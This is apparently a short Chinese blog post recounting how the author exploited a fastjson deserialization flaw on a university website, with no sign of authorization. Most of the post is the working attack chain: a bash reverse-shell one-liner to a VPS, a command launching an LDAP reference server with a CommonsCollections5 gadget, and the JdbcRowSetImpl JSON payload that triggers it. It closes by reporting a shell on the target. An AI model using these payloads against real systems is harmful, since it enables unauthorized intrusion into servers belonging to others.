getshell
2021-02-23
2021-02-23
# 一次 fastjson 反序列化 - 实战
爪哇一窍不通的我,某次找到一个高校的站点
随便登录抓包,发现是 json 请求
于是尝试使用 Bp 插件 Fastjsonscan 扫描
这不是 fastjson 反序列化漏洞吗,工具梭哈,首先生成编码后的反弹 shell 生成编码后的反弹 shell(编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html)
1 | bash -i >& /dev/tcp/vpsip/3344 0>&1 |
使用 rce 工具( https://github.com/wyzxxz/fastjson_rce_tool ),在 vps 上运行 rce 工具
1 | java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099 CommonsCollections5 "编码后的bash" |
再开启一个终端 vps 监听 3344 端口,bp 改包发送数据
1 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://vps:1099/Object","autoCommit":true} |
成功反弹 shell
# 总结
- 原理或许不知道,但是可以尝试工具梭哈,脚本小子就是我
- 多看大佬的文章,最新的漏洞,在实战时有很大的帮助